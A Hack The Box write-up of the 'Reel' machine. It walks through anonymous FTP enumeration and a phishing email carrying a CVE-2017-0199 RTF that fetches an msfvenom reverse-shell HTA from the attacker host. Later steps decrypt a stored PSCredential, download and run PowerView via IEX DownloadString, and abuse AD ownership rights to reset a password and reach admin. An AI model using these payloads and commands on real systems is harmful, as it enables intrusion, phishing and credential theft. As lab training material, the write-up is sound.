Reel HTB

IP

10.129.34.39

initial nmap scan

sudo nmap -p- --min-rate 10000 10.129.34.39 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the target

21,22,25,135,139,445,593,49159

Lets run a more in-depth scan of the open ports

sudo nmap -sCV -p21,22,25,135,139,445,593,49159 -oA TCP_ports 10.129.34.39

Results

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.94%I=7%D=1/16%Time=65A61895%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-16T05:51:02
|_  start_date: 2024-01-16T05:41:44
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2024-01-16T05:50:58+00:00
|_clock-skew: mean: -4s, deviation: 0s, median: -5s
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.68 seconds

Looking at the results

  • Windows Server 2012 R2 Standard 9600

  • FTP is enabled and allows anonymous auth

  • SSH is enabled (haven't seen that on a windows box before)

  • SMB is enabled

  • We have both the domain name HTB.LOCAL and Computer name REEL we will add this to our /etc/hosts file

  • SMPT possibly enabled will check this out

  • RPC

  • NetBIOS

Lets start with FTP

ftp anonymous@10.129.34.39

we find the directory documents and we have 3 files

after downloading the files, I noticed i had problems trying to Download the "Windows Event Forwarding.docx" file but switching to binary in ftp fixed the problem

binary
get Windows\ Event\ Forwarding.docx

readme.txt

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

  • short message, possible hint of what kind of documents we can read

  • Maybe we have to construct some sort of Phishing email?

  • More specifically what is RTF?

    • The Rick Text File format, these type of files are essentially text file, but have the capability of storing extra information such as font style, formatting, images, etc

AppLocker.docx

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

  • Short message, but could be handy to know when we get code execution

Windows Event Forwarding.docx

  • longer list

# get winrm config

winrm get winrm/config


# gpo config

O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)		// add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60	// add to GPO (60 seconds)

on source computer: gpupdate /force

# prereqs

start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server

# list subscriptions / export

C:\Windows\system32>wecutil es > subs.txt

# check subscription status

C:\Windows\system32>wecutil gr "Account Currently Disabled"

Subscription: Account Currently Disabled
        RunTimeStatus: Active
        LastError: 0
        EventSources:
                LAPTOP12.HTB.LOCAL
                        RunTimeStatus: Active
                        LastError: 0
                        LastHeartbeatTime: 2017-07-11T13:27:00.920


# change pre-rendering setting in multiple subscriptions

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events


# export subscriptions to xml

for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"

# import subscriptions from xml

wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"

# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)

1.

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events

2.

Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"

# check subscriptions are being created on the source computer

Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational


#### troubleshooting WEF

collector server -> subscription name -> runtime status

gpupdate /force (force checkin, get subscriptions)

check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors

checking the meta data

exiftool Windows\ Event\ Forwarding.docx

we do find a possible user on the system

nico@megabank.com

SMTP enumeration

Notice in our Nmap scans, we have the following smtp commands enabled

we should be able to confirm if our email we have found

nico@megabank.com is found on the smtp server

telnet 10.129.34.39 25
Trying 10.129.34.39...
Connected to 10.129.34.39.
Escape character is '^]'.
220 Mail Service ready
HELO shrek123@shrek123
250 Hello.
MAIL FROM: <shrek123@shrek123
550 Invalid syntax. Syntax should be MAIL FROM:<mailbox@domain>[crlf]
Mail FROM: <shrek123@shrek123>
250 OK
RCPT TO: <nico@megabank.com>
250 OK

we have now confirmed nico@megabank.com is on the smtp server, okay so what now?

Alright, we have

  • an email address within the smtp server

  • a readme.txt please email me any rtf format procedures - I'll review and convert. someone is expecting emails to be sent to them

  • using searchsploit we do find something interesting CVE-2017-0199 given the machine was created in 2018 this is the most likey intended foothold

  • it also gives us the following github link

LogoGitHub - bhdresh/CVE-2017-0199: Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.GitHub

To exploit CVE-2017-0199, we need to get a user within the system to open our malicious RTF file, which in turn make a http request for a HTA file, We want that HTA file to execute a revers -shell on the target machine

lets walk through the steps

  1. We want to generate a malicous HTA file that will execute on the system giving us a reverse -shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9010 -f hta-psh -o pickmeup.hta

  1. now we can create a malicous RTF file using the git repo above using the following options

python cve-2017-0199_toolkit.py -M gen -w whatAreYouWaiting4.rtf -u http://10.10.16.3/pickmeup.hta -t rtf -x 0

  • -M gen: generate document

  • -w whatAreYouWaiting4.rtf: output file name

  • -u http://10.10.16.3/pickmeup.hta: url to pick up payload

  • -t rtf: create a rtf file

  • -x 0: diable rtf obfuscation

  1. sett up a netcat listener

rlwrap -cAr nc -lvnp 9010

  1. start a python server with our payload residing in it

python3 -m http.server 80

  1. Now we just need to send the email

sendEmail -f shrek123@megabank.com -t nico@megabank.com -u "Are you going to read me???" -m "So you did read me mwah ha ha" -a whatAreYouWaiting4.rtf -s 10.129.34.39 -v

  • -f: from address, will send from the same domain to be safe

  • -t: to address. nico@megabank.com

  • -u: subject

  • -m:body

  • -a: attachment

  • -s: smtp server

  • -v:verbose

after waiting say 20 seconds we have a shell on the system

Priv Esc via nico

Looking through nico's desktop we can see an interesting file cred.xml 

C:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

we can see we have a serialized XML representation of a PSCredntial objectt for the user tom

we need to decrypt the secure password and to do so we can 

powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

Lets break down this one-liner

  • powershell -c: telling PowerShell to execute in command mode

  • $cred = Import-CliXml -Path cred.xml: we are importing the cred.xml and assigning it to the variable $cred , the Import-CliXml cmdlet is used to deserialize the XML content into a PowerShell object, in this case Our PSCredential object

  • $cred.GetNetworkCredential() | Format-List *": we then call the GetNetworkCredential() method on the $cred object, The GetNetworkCredential() method is typically used with a PSCredential object to retrieve the network credential information. The output of the GetNetworkCredential() is then formatted using Format-List *" which will display all the properties of the object in a list format

we are now left with a clear text password

Tom: 1ts-mag1c!!!

we did see SSH during our enumeration maybe we can SSH in as tom

ssh tom@10.129.34.39

  • it works

Priv Esc via Tom

we do find some interesting file within Tom's desktop

note.txt

Findings:                                                                                                        

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).                   

Maybe we should re-run Cypher query against other groups we've created.

Within C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

we find the file acls.csv lets use scp and copy the file onto our local host

scp tom@10.129.34.39:"C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/acls.csv" ./

  • Im not a massive fan of this lay out in a csv file, there's gotta be a better way to view this data

Lets perform some dynamic port forwarding and see if we can get bloodhound-python to enumerate the system

  1. establishing the dynamic port forwarding, for this we will use plink

plink -ssh tom@10.129.34.39 -P 22 -D 9000 -pw "1ts-mag1c\!\!\!"

  • -sh: Specifies that the connection should use the SSH protocol

  • tom@10.129.34.39: pass through the SSH credentials for tom

  • -P 22: Specifies the port number (22) on the SSH server to connect to. The default SSH port is 22

  • -D 9000: Specifies dynamic port forwarding on the local machine. This sets up a SOCKS proxy on port 9000 on the local machine.

  • -pw "1ts-mag1c\!\!\!": Specifies the password (1ts-mag1c!!) for the SSH user.

  1. Next we need to configure our proxychains.conf file

  1. we should be able to run bloodhound-python through our SOCKS proxy and connect to the ports that are running internally

proxychains bloodhound-python  -u tom -p '1ts-mag1c!!!' -ns 10.129.34.39 -d htb.local -c all --dns-tcp

  • proxychains: This command to proxy the traffic generated by bloodhound-python through a SOCKS proxy.

  • bloodhound-python: This is the BloodHound Python tool, which is used for Active Directory (AD) enumeration and analysis.

  • -u tom: Specifies the username (tom) for authenticating to the target Active Directory.

  • -p '1ts-mag1c!!!': Specifies the password (1ts-mag1c!!!) for the specified username.

  • -ns 10.129.34.39: Specifies the IP address of the domain controller or Active Directory server.

  • -d htb.local: Specifies the domain name (htb.local) of the Active Directory environment.

  • -c all: Specifies that all collection methods should be used.

  • --dns-tcp: Specifies the use of TCP for DNS queries. This can be useful when DNS over UDP is restricted or blocked.

Now that bloodhound-python has ran successfully, we can ingest the data

  1. start neo4j

sudo neo4j console

  • log in

  1. start up bloodhound

sudo bloodhound --nosandbox

we can mark our user TOM@HTB.LOCAL as owned, if we look at toms "First Degree Object Control" we can see the following

We can see we have "Write Owner" permission over CLAIRE@HTB.LOCAL , and CLAIRE@HTB.LOCAL has "GenericWrite" permission the BACKUP_ADMINS group, meaning we can add members to the group.

  • Alright we need to own the user account claire

  1. Lets load in PowerView.ps1 onto the system

start a python server on our local machine

python3 -m http.server 80
powershell.exe # start a powerview prompt
IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3/PowerView/PowerView.ps1')

  1. Next we need to set tom as the owner of claires ACL

Set-DomainObjectOwner -identity claire -OwnerIdentity tom

  1. we can now give tom the permission to change passwords of claires ACL

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

  1. Now we can create a $cred credential variable, and change claires password

$cred = ConvertTo-SecureString "Password1" -AsPlainText -Force
Set-DomainUserPassword -identity claire -accountpassword $cred

Now we should be able to SSH into claires account

ssh claire@10.129.34.39

  • we are in

Alright Lets add claire into the BACKUP_ADMINS

  1. we can use the net command

net group backup_admins claire /add

  1. Lets check who is in the group now

net group backup_admins

Now that claire is part of the BACKUP_ADMINS

  • Had to log out and back in for the changes to take effect, weird right?

lets check the permissions on the Administrators directory

claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              HTB\Backup_Admins:(OI)(CI)(F)
              HTB\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)

while trying to read the root.txt flag we get a big fat access denied

but we do find a directory full of backup scripts, looking through the scripts we do come across a possible administrator's password

Cr4ckMeIfYouC4n!

Lets see if we can SSH in as the Administrator

ssh administrator@10.129.34.39

  • we are in

PreviousMantis HTBNextFlight HTB

Last updated